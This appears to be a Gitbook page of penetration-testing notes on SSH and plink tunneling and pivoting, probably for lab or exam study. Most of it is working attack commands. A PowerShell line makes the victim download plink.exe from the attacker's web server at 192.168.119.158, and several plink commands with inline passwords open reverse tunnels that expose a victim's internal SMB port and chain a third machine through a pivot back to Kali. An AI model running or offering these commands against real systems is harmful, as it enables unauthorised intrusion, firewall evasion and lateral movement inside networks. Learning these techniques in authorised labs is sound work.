All Gitbook

Tunneling / (with SSH key)

Burp > proxychains > app: Settings > Network > Connections > SOCKS Proxy

sudo netstat -tulpn to check tunnel connections

plink ssh to kali from victim

#victim
netstat -ano #to see undiscovered service during nmap

#kali
python -m http.server 8080 #to host plink
service ssh start

#victim
powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.158:8080/plink.exe','C:/hfs/tmp/plink.exe')

cmd.exe /c echo y | plink.exe -ssh -l kali -pw kalipwd -R 192.168.119.158:7799:127.0.0.1:445 192.168.119.158

#kali
nmap -sT -sV -sC 127.0.0.1 7799

:445 = internal service ; :7799 = kali tunnel port to the target :445

#machine C
plink.exe -ssh -l b.user -pw b.pwd -N -R 10.1.1.9:1069:127.0.0.1:9050 10.1.1.9

#machine B 10.1.1.9
plink.exe -ssh -l kali -pw kalipwd -N -R 192.168.119.158:7799:127.0.0.1:1069 192.168.119.158

tunneling machine C :9050 to kali :7799 through machine B :1069

ssh to victim from kali

may use -i {cracked key id} flag if have Authorized_key cracked

or -i {authorized_key} if placed kali's key in the victim

pivot machine 8888 to windows victim 3389 (need victim pw)

kali connect to pivot machine 8888 to final victim 3389

ssh from victim to kali

after finding which port is opened on the next client from 1st victim

prevent ssh from asking for kali pwd with id_rsa

dynamic port forwarding

windows allowing other access local :80

LogoConfigure SSH Tunnel (Port Forwarding) on Windows | Windows OS HubWindows OS Hub
PreviousPersisting access with DC admin

Last updated